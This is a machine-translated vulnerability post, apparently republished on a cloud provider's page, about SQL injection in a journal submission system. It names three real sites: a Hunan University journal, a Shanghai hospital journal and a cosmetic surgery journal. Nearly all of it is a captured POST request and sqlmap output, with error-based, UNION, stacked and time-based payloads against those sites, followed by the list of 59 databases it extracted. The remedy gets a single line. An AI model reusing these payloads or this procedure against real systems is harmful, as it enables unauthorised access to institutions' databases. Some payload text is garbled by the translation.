General SQL injection vulnerability in a contribution system (affecting many enterprises and schools)

Source: Internet
Author: User
Tags sybase web server operating system microsoft iis

General SQL injection vulnerability in a contribution system (affecting many enterprises and schools)

 


Many search results are found here. Take a few tests:

POST/web/keysearch. aspx HTTP/1.1

Host: www.XXXX.com

User-Agent: Baiduspider

Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8

Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3

Accept-Encoding: gzip, deflate

Cookie: pai_lasttime = 1410760097025; pai_count = 0

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 95



Author = 1 & butSearch = % e6 % 9f % a5 % e8 % af % a2 & keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf

Case 1: Hunan University http://dxjykx.cnmanu.cn/


Sqlmap identified the following injection points with a total of 0 HTTP (s) reque

Sts:

---

Place: POST

Parameter: author

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1% 'AND 9293 = CONVERT (INT, (select char (58) + CHAR (109) + CHAR (105

) + CHAR (112) + CHAR (58) + (SELECT (case when (9293 = 9293) then char (49) else char (48)

END) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58 ))) AND '%' = '& butSearch = ?? & Ke

Yword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: UNION query

Title: Generic UNION query (NULL)-6 columns

Payload: author = 1% 'Union all select null, CHAR (58) + CHAR (1

09) + CHAR (105) + CHAR (112) + CHAR (58) + CHAR (100) + CHAR (74) + CHAR (79) + CHAR (71) + CHAR (115) +

CHAR (88) + CHAR (77) + CHAR (80) + CHAR (88) + CHAR (82) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (11

7) + CHAR (58), NULL -- & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state

= & Title = wolf



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: author = 1% '; waitfor delay '0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 &

Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: author = 1% 'waitfor delay' 0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 & N

Ian = 2016 & operat = & Qi = 1 & state = & title = wolf



Place: POST

Parameter: keyword

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1 & butSearch = ?? & Keyword = assd % 'AND 4223 = CONVERT (INT, (SELECT C

HAR (58) + CHAR (109) + CHAR (105) + CHAR (112) + CHAR (58) + (SELECT (case when (4223 = 4223) TH

En char (49) else char (48) END) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58 )))

AND '%' = '& Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: UNION query

Title: Generic UNION query (78)-6 columns

Payload: author = 1 & butSearch = ?? & Keyword = assd % 'Union all select 78, 78, 78, 7

8, 78, CHAR (58) + CHAR (109) + CHAR (105) + CHAR (112) + CHAR (58) + CHAR (75) + CHAR (90) + CHAR (88

) + CHAR (113) + CHAR (110) + CHAR (103) + CHAR (76) + CHAR (85) + CHAR (80) + CHAR (114) + CHAR (58) + CH

AR (115) + CHAR (97) + CHAR (117) + CHAR (58) -- & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title =

Wolf



Place: POST

Parameter: title

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % 'AND 4163 = CONVERT (INT, (select char (58) + CHAR (109) + CHAR (105) + CHAR (1

12) + CHAR (58) + (SELECT (case when (4163 = 4163) then char (49) else char (48) END) + CH

AR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58) AND '%' ='



Type: UNION query

Title: Generic UNION query (78)-6 columns

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % 'union all select 78, 78, 78, 78, CHAR (58) + CHAR (109) + CHAR (105) + CH

AR (112) + CHAR (58) + CHAR (108) + CHAR (97) + CHAR (79) + CHAR (74) + CHAR (71) + CHAR (110) + CHAR (69

) + CHAR (116) + CHAR (108) + CHAR (82) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58), 7

8 --

---

There were multiple injection points, please select the one to use for following

Injections:

[0] place: POST, parameter: author, type: Single quoted string (default)

[1] place: POST, parameter: title, type: Single quoted string

[2] place: POST, parameter: keyword, type: Single quoted string

[Q] Quit

>



[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server

Web server operating system: Windows 2003

Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727

Back-end DBMS: Microsoft SQL Server 2000

[13:41:08] [INFO] testing if current user is DBA

Current user is DBA: False

[13:41:08] [INFO] fetching database names

[13:41:08] [INFO] the SQL query used returns 59 entries

Available databases [59]:

[*] Bl

[*] Cdxxgc

[*] Cg

[*] Cghy

[*] Cy

[*] Cymx

[*] D1

[*] Demcom

[*] Demo

[*] Dj

[*] Dxjykx

[*] Eye

[*] Gjzhyx

[*] GuaHao

[*] Hh

[*] Hhzrkx

[*] Hlgl

[*] Hnxbyx

[*] Hxyqdz

[*] J4e

[*] Jjyx

[*] Lcjsyx

[*] Lcjyzzs

[*] Lcsjbx

[*] Lcsjwk

[*] Lnyxybj

[*] Main

[*] Master

[*] Mfskin

[*] Model

[*] Mrzxwk

[*] Msdb

[*] Mz

[*] Mzyfs

[*] Njsd

[*] Nky

[*] Northwind

[*] Nxgb

[*] Nydxxb

[*] Pifu

[*] Pubs

[*] Rfic

[*] SMS

[*] St

[*] Sypfb

[*] Tempdb

[*] Test

[*] Wcbx

[*] Wf

[*] Wlxb

[*] Xdx

[*] Xhnj

[*] Xjyx

[*] Xnxyxb

[*] Yxjz

[*] Zdblx

[*] Zjyx

[*] Zr

[*] Zxy.pdf



[13:41:08] [INFO] fetched data logged to text files under 'I :\???? \ SQLMAP ~ 1 \ Bin \

Output \ dxjykx.cnmanu.cn'



[*] Shutting down at 13:41:08



Case 2: Renji Hospital, Shanghai Jiao Tong University School of Medicine, http://www.cjge-manuscriptcentral.com



D: \ Python27 \ sqlmap> sqlmap. py-r 1.txt -- dbs



Sqlmap/0.9-automatic SQL injection and database takeover tool

Http://sqlmap.sourceforge.net



[*] Starting at: 13:25:16



[13:25:16] [INFO] parsing HTTP request from '1.txt'

[13:25:16] [INFO] using 'd: \ Python27 \ sqlmap \ output \ www. cjge-manuscriptcentral.co

M \ session 'as session file

[13:25:16] [INFO] resuming injection data from session file

[13:25:16] [INFO] resuming back-end DBMS 'Microsoft SQL server 100' from sessio

N file

[13:25:16] [INFO] testing connection to the target url

Sqlmap identified the following injection points with a total of 0 HTTP (s) reque

Sts:

---

Place: POST

Parameter: author

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: author = 1'; waitfor delay '0: 0: 5'; -- AND 'enfs' = 'enfs & butSearch = Query

& Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = Mr.



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: author = 1 'waitfor delay' 0: 0: 5' -- AND 'exwq' = 'exwq & butSearch = query & k

Eyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = Mr.

---



[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server

Web server operating system: Windows 2003

Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727

Back-end DBMS: Microsoft SQL Server 2000

[13:25:17] [INFO] fetching database names

[13:25:17] [INFO] fetching number of databases

[13:25:17] [WARNING] time-based comparison needs larger statistical model. Makin

G a few dummy requests, please wait ..

59

[13:25:47] [INFO] retrieved:

[13:25:52] [WARNING] adjusting time delay to 1 second

Bl

[13:26:33] [INFO] retrieved: cdxxgc

[13:27:12] [INFO] retrieved: cg

[13:27:25] [INFO] retrieved: cghy

[13:27:51] [INFO] retrieved: cy

[13:28:03] [INFO] retrieved: cymx

[13:28:30] [INFO] retrieved: d1

[13:28:42] [INFO] retrieved: demcom

[13:29:18] [INFO] retrieved: demo

[13:29:44] [INFO] retrieved: dj

[13:29:58] [INFO] retrieved: dxjykx

[13:30:39] [INFO] retrieved: Eye

[13:30:56] [INFO] retrieved: gjzhyx

[13:31:38] [INFO] retrieved: GuaHao

[13:32:13] [INFO] retrieved: hh

[13:32:30] [INFO] retrieved: hhzrkx

[13:33:13] [INFO] retrieved: hlgl

[13:33:43] [INFO] retrieved: hnxbyx

[13:34:26] [INFO] retrieved: hxyqdz

[13:35:07] [INFO] retrieved: j4e

[13:35:27] [INFO] retrieved: jjyx

[13:35:55] [INFO] retrieved: lcjsyx

[13:36:35] [INFO] retrieved: lcjyzzs

[13:37:23] [INFO] retrieved: lcsjbx

If the vulnerability is not detected, you can obtain the database information for the vulnerability!



Case 3: China cosmetic and orthopedic journal mr.cnmanu.cn

Sqlmap identified the following injection points with a total of 0 HTTP (s) reque

Sts:

---

Place: POST

Parameter: title

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % 'AND 7683 = CONVERT (INT, (select char (58) + CHAR (104) + CHAR (119) + CHAR (1

14) + CHAR (58) + (SELECT (case when (7683 = 7683) then char (49) else char (48) END) + CH

AR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58) AND '%' ='



Type: UNION query

Title: Generic UNION query (41)-6 columns

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % 'union all select 41, 41, 41, 41, CHAR (58) + CHAR (104) + CHAR (119) + CH

AR (114) + CHAR (58) + CHAR (76) + CHAR (69) + CHAR (116) + CHAR (66) + CHAR (113) + CHAR (78) + CHAR (71

) + CHAR (76) + CHAR (75) + CHAR (98) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58), 41

--



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % '; waitfor delay '0: 0: 5 '--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat

E = & title = wolf % 'waitfor delay' 0: 0: 5 '--



Place: POST

Parameter: keyword

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1 & butSearch = ?? & Keyword = assd % 'AND 2981 = CONVERT (INT, (SELECT C

HAR (58) + CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + (SELECT (case when (2981 = 2981) TH

En char (49) else char (48) END) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58 ))

) AND '%' = '& Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: UNION query

Title: Generic UNION query (41)-6 columns

Payload: author = 1 & butSearch = ?? & Keyword = assd % 'Union all select 41, 41, 41, 4

1, 41, CHAR (58) + CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + CHAR (122) + CHAR (72) + CHAR (1

05) + CHAR (70) + CHAR (111) + CHAR (73) + CHAR (83) + CHAR (98) + CHAR (117) + CHAR (100) + CHAR (58) + C

HAR (110) + CHAR (119) + CHAR (116) + CHAR (58) -- & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & titl

E = wolf



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: author = 1 & butSearch = ?? & Keyword = assd % '; waitfor delay '0: 0: 5' -- & Lm = 2 &

Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: author = 1 & butSearch = ?? & Keyword = assd % 'waitfor delay' 0: 0: 5' -- & Lm = 2 & N

Ian = 2016 & operat = & Qi = 1 & state = & title = wolf



Place: POST

Parameter: author

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause

Payload: author = 1% 'AND 6529 = CONVERT (INT, (select char (58) + CHAR (104) + CHAR (119

) + CHAR (114) + CHAR (58) + (SELECT (case when (6529 = 6529) then char (49) else char (48)

END) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58 ))) AND '%' = '& butSearch = ?? & K

Eyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: UNION query

Title: Generic UNION query (NULL)-6 columns

Payload: author = 1% 'Union all select null, CHAR (58) +

CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + CHAR (119) + CHAR (119) + CHAR (101) + CHAR (76) + CH

AR (87) + CHAR (114) + CHAR (81) + CHAR (75) + CHAR (70) + CHAR (71) + CHAR (58) + CHAR (110) + CHAR (119

) + CHAR (116) + CHAR (58) -- & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & st

Ate = & title = wolf



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: author = 1% '; waitfor delay '0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 &

Nian = 2016 & operat = & Qi = 1 & state = & title = wolf



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: author = 1% 'waitfor delay' 0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 & N

Ian = 2016 & operat = & Qi = 1 & state = & title = wolf

---

There were multiple injection points, please select the one to use for following

Injections:

[0] place: POST, parameter: author, type: Single quoted string (default)

[1] place: POST, parameter: title, type: Single quoted string

[2] place: POST, parameter: keyword, type: Single quoted string

[Q] Quit

>



[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server

Web server operating system: Windows 2003

Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727

Back-end DBMS: Microsoft SQL Server 2000

[13:40:55] [INFO] testing if current user is DBA

Current user is DBA: False

[13:40:55] [INFO] fetching database names

[13:40:55] [INFO] the SQL query used returns 59 entries

Available databases [59]:

[*] Bl

[*] Cdxxgc

[*] Cg

[*] Cghy

[*] Cy

[*] Cymx

[*] D1

[*] Demcom

[*] Demo

[*] Dj

[*] Dxjykx

[*] Eye

[*] Gjzhyx

[*] GuaHao

[*] Hh

[*] Hhzrkx

[*] Hlgl

[*] Hnxbyx

[*] Hxyqdz

[*] J4e

[*] Jjyx

[*] Lcjsyx

[*] Lcjyzzs

[*] Lcsjbx

[*] Lcsjwk

[*] Lnyxybj

[*] Main

[*] Master

[*] Mfskin

[*] Model

[*] Mrzxwk

[*] Msdb

[*] Mz

[*] Mzyfs

[*] Njsd

[*] Nky

[*] Northwind

[*] Nxgb

[*] Nydxxb

[*] Pifu

[*] Pubs

[*] Rfic

[*] SMS

[*] St

[*] Sypfb

[*] Tempdb

[*] Test

[*] Wcbx

[*] Wf

[*] Wlxb

[*] Xdx

[*] Xhnj

[*] Xjyx

[*] Xnxyxb

[*] Yxjz

[*] Zdblx

[*] Zjyx

[*] Zr

[*] Zxy.pdf



[13:40:55] [INFO] fetched data logged to text files under 'I :\???? \ SQLMAP ~ 1 \ Bin \

Output \ mr.cnmanu.cn'



[*] Shutting down at 13:40:55

 

Solution:

It is relatively simple to fix vulnerabilities. Multiple POST global filtering

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.